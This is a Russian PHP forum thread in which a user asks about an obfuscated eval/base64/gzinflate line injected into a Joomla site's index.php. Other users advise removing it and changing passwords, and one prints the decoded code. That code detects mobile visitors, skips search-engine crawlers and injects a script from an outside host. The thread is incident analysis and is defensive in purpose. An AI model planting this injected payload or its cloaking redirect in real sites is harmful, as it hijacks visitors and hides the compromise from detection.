[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Редирект мобильных телефонов с сайта на джумле
Форум PHP программистов > Безопасность данных и приложений
Vorchun
7.06.2012 - 18:31
Всем привет.
Приятель попросил посмотреть почему с его сайта, все кто заходит с мобильных устройств постоянно куда-то редиректятся.

.htaccess вроде бы чистый. По крайней мере определение мобильников по юзер-агенту я там не нашел.
А вот index.php в корне, имел странную вставку кода в одну строку.

<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'jVNtT9tADP4+af8hQxNtBW0hgQQEbKtKYPsyoQ72pYmqa2Kao/cSckebbt5/n9OkA7ROWiS/nv3YZ1/4vdNu5wXMJpLZJGu3+hZKG/UXKu0tWd5bSoEszwVPmOVaPR+UmZUi2iul6Bve2nc+vZ98C0ffw9G49fn29mYyGA7Dm9tW3HEQnVcFmCAsIFipOTKVFpqnyBZM2ZnGqWDJfApFscIpqEdMQAhMCp7MwWKqEy01gmBcAWY2QQ5ST7kA5HmmVSVYWrFHYjrFB1cCPhA26hwK1pNccZQ8zVFKIkolZnWhBUMFSReVnnOGOROSmGJGK55gnnHBc4N1CcNm INFkrMjRcOiikaywzZlWKzQrOeVMoe02vdFlnww+5VFvWuilgWKtC67muNApu68yaaS4hKk2uOQFCDAGy5RhqbXEHxa2z/iOrMngOvy6dc7SACuSDGX08fFiO8AovApH4YiyO87urvPudT5LuLLaZLQpoA2wekm0haUSmua85Ip0E3UlpJxF3VywFV1uRTuFEmdaz8T/NN5xfr5949BXc0gy7bTODS09tx8WrHAmByUcwsnFeCcqvWFUBl5U+kSBS/J0Z5/cwQHRUVS6jQxOa59/TCmX5Hdrf2UHJ03sFdkDokOy/Ua+gn6B6zbYmzPvGddv8NZEMd6gxq6oig2opnvZ9EOxflU3rHtxwxpr7busc7yr7Xeoeq3qu37T53HTC0nfr2LqUbxwbUI2vsBdh1Rde2E9zHWX/x6oF9Zm8GIm6znuxGf0Oz5JUHbcLGh8HMftjX4Q723Uw3gPVKJTuBt9GWqZ03tXtv1XthvHnT853nP6Udw5O+8376F1Vr+Se/qlsnaHrF+/AQ=='\x29\x29\x29\x3B"); ?>
<?php
/**
 * @version		$Id: index.php 20806 2011-02-21 19:44:59Z dextercowley $
 * @package		Joomla.Site
 * @copyright	        Copyright © 2005 - 2011 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.

//Дальше идет обычный код
?>

Я так понимаю, самая первая строчка и является причиной редиректов. Единственное, я не знаю как ее декодировать. Может быть кто подскажет. Хотелось бы взглянуть на чистый код.

_____________
<?
If (you wanna shoot) {shoot "don't talk";}
?>
© The Good, The Bad & The Ugly
alexbel2404
7.06.2012 - 19:24
А не надо декодировать, удали ее, потом поменяй везде пароли.
pak
7.06.2012 - 19:39
интересно как он расшифровывается.
Invis1ble
8.06.2012 - 00:19
Свернутый текст
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|i paq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sh arp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) {
    
    echo '<script>document.write(\'<script type="text/javascript" src="http://ru-phone.com/?type=js&seref=\' + encodeURIComponent(document.referrer) + \'"></script>\');</script>';
    flush();
}


_____________

Профессиональная разработка на заказ

Я на GitHub | второй профиль

Vorchun
8.06.2012 - 00:40
Invis1ble, ай спасибо, дорогой. Лови + в карму. wink.gif
Цитата
А не надо декодировать, удали ее, потом поменяй везде пароли.

Ну это я сделал еще до того как сюда запостить. wink.gif
Цитата
интересно как он расшифровывается.

Вот и мне любопытно было. wink.gif

_____________
<?
If (you wanna shoot) {shoot "don't talk";}
?>
© The Good, The Bad & The Ugly
Invis1ble
8.06.2012 - 00:44
alexbel2404 тебе правильный совет дал - меняй везде пароли.
если ситуация повторится - нужно анализировать логи и скорее всего искать дыры в скриптах

_____________

Профессиональная разработка на заказ

Я на GitHub | второй профиль

Vorchun
8.06.2012 - 00:52
Цитата (Invis1ble @ 7.06.2012 - 23:44)
alexbel2404 тебе правильный совет дал - меняй везде пароли.
если ситуация повторится - нужно анализировать логи и скорее всего искать дыры в скриптах

Ну сменить пароли, я посоветовал приятелю сразу же после того как отредактировал ему index.php. Думаю это он уже сделал.
А дыра скорее всего у него же на компе.
Я так понял, у него троян, который взломщику данные с FTP клиентов сливает.
А дальше, все эти данные в скрипт и полетели на автомате индексные файлы в корневых каталогах править. Это я заключил из того как сделана вставка кода. Руками, я полагаю, строчку вставляли бы более аккуратно и менее заметно.

_____________
<?
If (you wanna shoot) {shoot "don't talk";}
?>
© The Good, The Bad & The Ugly
Invis1ble
8.06.2012 - 00:54
Цитата
Я так понял, у него троян, который взломщику данные с FTP клиентов сливает.

вполне возможно

_____________

Профессиональная разработка на заказ

Я на GitHub | второй профиль

Гость_Дима
17.05.2013 - 23:05
Расшифровка примерно такая:
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile |iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips| phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) {document[write('<script type="text/javascript" src="http://ru-phone.com/?type=js&seref=referrer"></script>')]; flush();}
Invis1ble
18.05.2013 - 00:47
Гость_Дима
ты опоздал с ответом примерно на год laugh.gif
http://phpforum.ru/index.php?showtopic=0&v...dpost&p=1884660

_____________

Профессиональная разработка на заказ

Я на GitHub | второй профиль

Быстрый ответ:
Powered by dgreen

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.